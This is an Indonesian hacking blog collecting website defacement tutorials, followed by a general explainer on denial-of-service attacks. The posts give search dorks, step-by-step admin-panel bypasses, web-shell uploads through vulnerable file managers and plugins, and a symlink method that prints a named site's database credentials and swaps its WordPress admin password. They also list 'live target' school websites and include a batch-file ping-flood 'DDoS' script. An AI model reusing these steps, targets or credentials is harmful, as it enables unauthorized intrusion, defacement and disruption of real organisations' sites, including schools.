3

Deface website dengan inspect element

Senin, 18 November 2013
Deface |  Powered By Multi Profit Websites [Inspect Element]
Siang siang gini enaknya posting tentang hacking, Karena sudah lama sekali saya tidak posting artikel di blog ini .. Entah kenapa rasa semangat blogging sudah mulai hilang , Ok kali ini langsung saja kita akan membahas cara deface , Powered by multi profit websites ( inspect element) ..

pertama cari website yang vuln dengan teknik inspect element,, gunakan dork dibawah ini:

intext:"Powered By: Multi Profit Websites"
inurl:/index_ebay.php
inurl:/index_amazon.php
inurl:/index_rrfc.php
inurl:/index_info.php
inurl:/index_youtube.php
inurl:/index_rss.php

kalo sudah pilih salah satu website,,
tambahkan kata "admin" pada akhir url,,
contoh:
http://[site]/index_info.php diganti menjadi http://[site]/admin

kalau belum di patch akan keluar login adminya

setelah kita berhasil masuk halaman login adminya sekarang kita lakukan inspect element, lihat gambar


pada tahap ini kta cari element <input type="hidden" name="do_type" value="admin_setting_read"> kalau sudah ketemu kita ganti kata "hidden" dengan kata "text" kemudian klikan kursor disembarang tempat maka akan keluar textbox dengan tulisan  "admin_setting_read" dan ganti kata "read" dengan "write" jadinya seperti ini "admin_setting_write" dan tekan enter

jika berhasil akan keluar halaman seperti dibawah ini dan langkah selanjutnya kita klik login,, lihat gambar


jika berhasil kita akan langsung masuk ke halaman adminya ,, lihat gambar


Langkah selanjutnya kita cari menu "Add/Remove New Navigation Pages"  dan kita klik aja kalo sudah akan keluar halaman seperti pada gambar. Pada kolom "enter a name your new navigation bla bla bla" kita ketikan nama file shell kita contoh "sc.php" dan klik "add new navigation page" lihat gambar

Masih dihalaman yang sama coba gulir kebawah dan lihat apa nama file shell kita udah ada,, kalo udah kita ganti nama file shell kita contoh sc.php.html menjadi /sc.php lihat gambar
sebelum

sesudah 
kemudian klik "sort navigation pages"


Kalau sudah sekarang kita masuk ke menu "edit navigation page", nanti ada menu scroll kita pilih aja nama file shell kita contoh sc.php.html dan kita lakukan inspect element untuk mengganti "sc.php.html" menjadi "sc.php" lihat gambar

masih pada halaman yang sama pada "enter a page title bla bla bla" kita ketikan nama file shell kita dan pada "URL for this page" kita isikan url kita contoh "main_pages/sc.php" dan checkliat semua pilihan lihat gambar



kalo sudah sekarang saatnya kita mengedit halaman kita pada kotak yang sudah tersedia jangan lupa pilih source, alangkah baiknya semelum kita memasukan source kita enter 3x kemuian baru diikuti source kita setelah memasukan source kita enter lagi 3x langkah selanjutnya klik "save edit navigation page" lihat gambar





apabila keluar halaman seperti pada gambar dibawah ini berati tugas kita sukses menanam shell


Langkah selanjutnya kita masuk url dimana kita tadi menanam shell contoh http://[site]/main_pages/sc.php
masuklah kita kedalam shell hehhe lihat gambar


Sekian tutor kali ini meskipun sedikit semoga bermanfaat dan gunakan sebaik- baiknya, 
0

Deface Website Dengan Metode Symlink

Jumat, 15 November 2013

Deface Website Dengan Metode Symlink

Halo sob (^_^), kali ini saya akan berbagi cara menggunakan Symlink.
Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^).

Pertama masuk ke Shell yang sudah di tanam di web target.
lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini Sob (^_^)



















Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.

Selanjutnya akses / buka symlink yang telah agan upload.


















Lalu klik user & domain & symlink.


















Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".



















Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.

Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.


















Perhatikan baris ini :
define('DB_HOST', 'localhost');

DB NAME = thefussy_wrdp3

DB USER = thefussy_wrdp3

DB PASSWORD = CZyLRz1EuwSd

DB HOST = localhost
Diatas adalah informasi mengenai Akses Database MySQL.

Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.


















Klik koneksi MySQL.

















Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.

Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.



















Lalu, saya klik "wp_user".



















Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).
Agan buat password dalam bentuk MD5 Disini Sob (^_^).


Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a





















Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.

Berarti saya akan login dengan username admin dan password 121212.
Sekarang kita coba sob (^_^). 

















Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin

Saya login & wauuuuu, kereennn sob (^_^).

Saya berhasil masuk (^_^).


















Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak (^_^)

Selamat Mencoba (^_^).
1

Cara Mencari Target Vuln WebDav Dengan reverse IP


Cara Mencari Target Vuln WebDav Dengan reverse IP


dah lama gak post sayangnya laptop vga ane rusak jadi maklumi tampilan segede gajah :/
Ok langsung aja pasti dah tau webdav kan ?
kalo blum tau mending google dulu
kalo udah nih ane kasih lagi softwarenya
WebDav Rootkit Hmei7 Download
Langsung cari target yg vuln dengan dork berikut
Dork WebDav : 
inurl:/Hmei7.asp;.txt site:com
ntar kurang lebih seperti ini gambarnya



Copy URL tersebut dan Paste di
http://www.yougetsignal.com/tools/web-sites-on-web-server/
Untuk mengetahui domain yang 1 server dengan web tersebut
Seperti ini



Found 40 domains hosted on the same web server as file9.bemycio.com (67.40.161.74).Lumayan lah 40 domain iseng-2 berhadiah gan
Langsung Copas smua tuh web di notepad kyk gambar ini
ini main replace pada notepad biar kita mudah/cepat untuk menyusun setiap domain tersebut
Ntar tiggal enter-enter aja kyk gini
< SPASI > di hapus di ganti spasi beneran -_-"

Habis itu Save AS file dengan nama terserahagan.txt
Habis itu buka webdav dan load File yang agan save tadi contoh punya ane x.txt
Habis itu Klik open
Jangan lupa setting yang ada di kanan langsung di Setting biar langsung file .html bukan shell .asp;.txt lagi
nih contoh langsung ane klik SERANG !!

0

Cara Deface Web Dengan WPStore Themes Uploader

assalammualaikum wr.wb kali ini cara yang saya gunakan yaitu mengupload shell kita dengan exploit

1. Masukkan dork ini ke kotak pencarian google
inurl:/wp-content/themes/WPstore/
intext:"You have 0($0) item in your Shopping Bag"

2. Pilih salah satu dari hasil penelusuran

3. Masukkan exploit berikut /wp-content/themes/WPStore/upload/
Contoh: www.site.com/wp-content/themes/WPStore/upload/

4. Nanti akan muncul tampilan berikut




Anda klik "pilih file" untuk mengupload shell anda.

5. Tunggu beberapa saat

6. Jika shell sudah tertanam, anda buka shell anda dengan cara membuka url'nya
Contoh: www.site.com/wp-content/uploads/products_img/namashell.php

7. Anda hanya tinggal eksekusi saja, cari file index.php / index.html nya lalu rubah isinya dengan script deface anda

Semoga bermanfaat ^_^
5

cara hack / deface website sekolah ( sch.id )



assalammualaikum wr.wb / salam sejahtera Kali Ini saya akan share cara hack website sekolah anda ( sch.id ) terlebih dahulu anda persiapkan bahan nya. . .

Bahan:
- File txt (bikin di notepad)


Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?


Exploit:
/editor/filemanager/connectors/test.html

/editor/filemanager/connectors/uploadtest.html

PAKAI SALAH SATU EXPLOITNYA



1. Contoh:
http://blabla.sch.id/html/siswa.php
http://blabla.sch.id/html/alumni.php
http://blabla.sch.id/html/guru.php


2. Ganti jadi:
http://blabla.sch.id/editor/filemanager/connectors/uploadtest.html

3. Ganti ASP Jadi PHP

4. masukan file txt yang sudah disiapkan (open -> upload)

5. Hasilnya:  http://xxx.sch.id/userfiles/file/nama-file.txt



Nih, buat yang males nyari langsung aja yang sudah disiapkan:



live target :
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html
0

deface dengan Remote File Upload Vulnerability

Jumat, 08 November 2013
assalammualaikum wr.wb kali ini saya akan meng-share cara deface dengan Remote File Upload Vulnerability langsung saja kita mulai

alat-alat yang di butuhkan :


- Google
- DORk
- BRAIN
- Exploit: /editor/editor/filemanager/upload/test.html
Dork :
• inurl:/editor/editor/filemanager/
• inurl:/HTMLEditor/editor/"

==========================================================================================
langkah - langkah
cari web di google  menggunakan dork :















pilih salah satu web yang ada saya ambi 1 web nya http://www.buraevo.ru/editor/editor/filemanager/upload/

setelah itu tampilan nya kurang lebih akan seperti ini












masukan exploit nya di url : www.TargetKamu.com/editor/editor/filemanager/upload/test.html
contoh web deface saya   : http://www.buraevo.ru/editor/editor/filemanager/upload/test.html

setelah di masukan exploit akan menjadi seperti ini














setelah itu ubah ASP menjadi PHP














jika  sudah di ganti klik chose file dan pilih script yang akan kamu upload

dan klik send it to server

jika tidak ada notif eror file mu berhasil di upload
tampilan nya akan menjadi seperti ini













setelah itu copy upload file url nya

www.TargetKamu.com/UserFiles/scriptmu.html

ini contoh DEMO nya link : http://www.buraevo.ru/UserFiles/hackkill1.blogspot.com.html
0

Deface Dengan Exploit FileChucker

Rabu, 06 November 2013

Deface Dengan Exploit FileChucker

Mungkin ini cara deface cukup mudah selain menggunakan aplikasi Webdav,mungkin in juga tutor deface sudah lama,tapi tidak apa-apa kan jika saya berbagi ilmu saya

bahan - bahan yg perlu di siapkan :

- Dork
- kesabaran
- your brain

========================================================================
Dork :
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable

Langkah Pertama 1

Cari web korban menggunakan dork di google

















Pilih Salah satu web yang ada di laman itu kalian juga bisa mencari nya sampai laman yang terakhir
saya ambil 1 target yaitu : cceaman.com/cgi-bin/filechucker.cgi



















setelah itu tampilan nya akan menjadi seperti ini :


















klik choose file masukan script anda jika belum punya script silahkan cari di goole banyak

setelah itu klik begin upload


















tunggu hingga proses upload selesai
















jika sudah selesai tampilan nya akan seperti ini :


















copy tulisan yang ada di kolom URL To File

















setelah itu buka tab baru dan lihat hasil nya , Selesai mudah dan simple kan ?

sekian tutor deface dari saya untuk hari ini jika ada yang kurang jelas silahkan tanyakan di komentar ^_^
20

Cara Membuat Tool Hacker Sederhana Menggunakan Notepade.

Senin, 04 November 2013
hai sobat blogger...
pada kesempatan kali ini hackkill1 bagi2 ilmu atau sharing yang lebih tepatnya kali ya ..?? sharing ilmu maksud nya....

ahg.. pada kali ini hackkill1 memposting Cara Membuat Tool Hacker Sederhana Menggunakan Notepade.

Pada kali ini kita akan membuat serangan Ddos Attack...

apa itu Ddos Attack adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menhabiskan sumber ( resource ) yang di miliki oleh komputer tersebut. sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar, sehingga secara tidak langsung mencegah pengguna lain untu memperoleh akses layanan dari komputer yang di serang tersebut..

uda dulu ahg penjelasan tentang Ddos Attack nya..
langsung saja kita ke cara pembuatan Ddos Attack..

yang perlu di persiapkan adalah :
1. PC / Laptop
2. Programe Notepade. ( sudah ada dalam windows kita semua )

cara membuat nya adalah :
1. buka notepade sobat semua..
2. copy code script di bawah ini kedalam notepade sobat.
ingat : jangan mengganti script di bawah ini 

@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server   +
echo + Author : hackkill1             +
echo + Visite : hackkill1.blogspot.com+
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS


3. nama file terserah sobat  ( simpan dengan extensi .bat )
4. contohnya Ddos.bat
5. jalankan file dengan cara double klik.

cara pakainya :
- pada menu server - target sobat dapat memasukan ip target sobat
- masukan alamat web yang ingin Ddos

selamat mencoba :D
1

Pengertian DDoS Attack

Pengertian DDoS Attack



Dalam artikel ini kelompok kami akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com.

Apa itu DoS

Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.
Secara umum ada 2 cara melakukan serangan DoS:
  1. Mematikan Server
  2. Menyibukkan Server
    • Tanpa bug/vulnerability
    • Meng-exploit bug/vulnerability
DoS dengan Mematikan Server: Kill Them!

Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.
Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.
Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung  sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.
Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:
  • Ping of Death ( CA-1996-26 )
  • Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.
  • MySQL IF Query DoS ( SA25188 )
  • Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.
  • Cisco Global Site Selector DNS Request Denial of Service (SA33429)
  • Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.
Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.

DoS dengan Menyibukkan Server: Make Them As Busy As Possible!

Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit.  Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.
Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.
DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:
  • Exploiting vulnerability: Menyerang dengan malicious request/packet
  • No vulnerability exploitation: Menyerang dengan normal request/packet
Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.

Make Server Busy by Exploiting Vulnerability


Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.
Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik  hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.
Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:
  • TCP SYN Flood DoS
  • Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.
    Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.
  • Apache mod_deflate DoS
  • Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.
    Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.
Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket  yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.

Make Server Busy Without Exploiting Vulnerability


Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.
Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).
Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.
DDoS Botnet Attack
Courtesy of: www.dos-attack.net
Gambar di atas menjelaskan cara kerja DDoS. Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).
Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.

Kesimpulan

Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:
  • Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
  • Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
    • Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
    • Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.